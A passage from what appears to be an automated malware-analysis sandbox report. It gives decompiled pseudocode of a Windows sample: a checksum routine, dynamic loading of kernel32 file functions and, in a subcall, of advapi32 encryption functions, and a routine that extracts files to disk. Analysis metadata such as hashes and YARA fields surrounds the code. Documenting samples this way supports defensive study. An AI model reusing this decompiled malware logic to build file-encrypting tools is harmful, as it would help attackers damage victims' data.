& 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t79[1] & 0x000000ff) * 4);
							_t73 =  &(_t79[2]);
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					if(_a12 != 0) {
						do {
							_t35 = _t35 >> 0x00000008 ^  *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4);
							_t73 =  &(_t73[1]);
							_t32 =  &_a12;
							 *_t32 = _a12 - 1;
						} while ( *_t32 != 0);
					}
					return  !_t35;
				} else {
					return 0;
				}
			}












                    0x00405422
                    0x00405427
                    0x00405436
                    0x0040543d
                    0x00405447
                    0x0040544a
                    0x0040544f
                    0x00405465
                    0x0040547f
                    0x00405496
                    0x004054ad
                    0x004054c4
                    0x004054db
                    0x00405503
                    0x00405505
                    0x00405506
                    0x00405506
                    0x0040550d
                    0x00405512
                    0x00405514
                    0x00405527
                    0x00405529
                    0x0040552a
                    0x0040552a
                    0x0040552a
                    0x00405514
                    0x00405534
                    0x00405429
                    0x0040542c
                    0x0040542c

                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
                    • Instruction ID: 3f72058ef88e406f14a8e4c5cd972b2546dbbe82ce95f55f9558457d0f17cbf0
                    • Opcode Fuzzy Hash: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
                    • Instruction Fuzzy Hash: 8E31A133E285B207C3249EBA5C4006AF6D2AB4A125B4A8775DE88F7355E128EC96C6D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040170A() {
				void* _t3;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t13;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				if(E00401A45() == 0) {
					L11:
					return 0;
				}
				_t18 =  *0x40f878; // 0x0
				if(_t18 != 0) {
					L10:
					_t3 = 1;
					return _t3;
				}
				_t13 = LoadLibraryA("kernel32.dll");
				if(_t13 == 0) {
					goto L11;
				}
				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
				_t11 = GetProcAddress(_t13, "CloseHandle");
				_t20 =  *0x40f878; // 0x0
				 *0x40f890 = _t11;
				if(_t20 == 0) {
					goto L11;
				}
				_t21 =  *0x40f87c; // 0x0
				if(_t21 == 0) {
					goto L11;
				}
				_t22 =  *0x40f880; // 0x0
				if(_t22 == 0) {
					goto L11;
				}
				_t23 =  *0x40f884; // 0x0
				if(_t23 == 0) {
					goto L11;
				}
				_t24 =  *0x40f888; // 0x0
				if(_t24 == 0) {
					goto L11;
				}
				_t25 =  *0x40f88c; // 0x0
				if(_t25 == 0 || _t11 == 0) {
					goto L11;
				} else {
					goto L10;
				}
			}













                    0x00401713
                    0x004017d8
                    0x00000000
                    0x004017d8
                    0x0040171b
                    0x00401721
                    0x004017d3
                    0x004017d5
                    0x00000000
                    0x004017d5
                    0x00401732
                    0x00401736
                    0x00000000
                    0x00000000
                    0x00401751
                    0x0040175e
                    0x0040176b
                    0x00401778
                    0x00401785
                    0x00401792
                    0x00401797
                    0x00401799
                    0x0040179f
                    0x004017a5
                    0x00000000
                    0x00000000
                    0x004017a7
                    0x004017ad
                    0x00000000
                    0x00000000
                    0x004017af
                    0x004017b5
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017bd
                    0x00000000
                    0x00000000
                    0x004017bf
                    0x004017c5
                    0x00000000
                    0x00000000
                    0x004017c7
                    0x004017cd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                      • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                    • API String ID: 2238633743-1294736154
                    • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                    • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                    • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                    • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272COMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				char _t100;
				void* _t112;
				void* _t113;
				int _t124;
				long _t131;
				intOrPtr _t136;
				char* _t137;
				char* _t144;
				void* _t148;
				char* _t150;
				void* _t154;
				signed int _t155;
				long _t156;
				void* _t157;
				char* _t158;
				long _t159;
				intOrPtr* _t161;
				long _t162;
				void* _t163;
				void* _t164;

				_t154 = __edx;
				_t139 = __ecx;
				_t136 = _a16;
				_t161 = __ecx;
				if(_t136 == 3) {
					_t78 =  *((intOrPtr*)(__ecx + 4));
					_t155 = _a4;
					__eflags = _t155 - _t78;
					if(_t155 == _t78) {
						L14:
						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
						__eflags = _t156;
						if(_t156 <= 0) {
							E00406A97( *_t161);
							_t14 = _t161 + 4;
							 *_t14 =  *(_t161 + 4) | 0xffffffff;
							__eflags =  *_t14;
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = _t156;
							if(_t156 <= 0) {
								__eflags = _t156 - 0xffffff96;
								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							}
							return 0x600;
						} else {
							L17:
							return 0;
						}
					}
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						E00406A97( *__ecx);
						_pop(_t139);
					}
					_t89 =  *_t161;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
						L3:
						return 0x10000;
					} else {
						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
							L11:
							_t91 =  *_t161;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
								 *(_t161 + 4) = _t155;
								_pop(_t139);
								goto L14;
							}
							E00406520(_t91);
							L10:
							goto L11;
						}
						E004064E2(_t139, _t89);
						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E00406A97( *_t161);
						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E00406C40(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t137 =  &(_t144[1]);
												L45:
												_t100 = _t144[1];
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E00407070(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L00407700();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E00406A97( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E00407070(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E00407070();
									goto L17;
								}
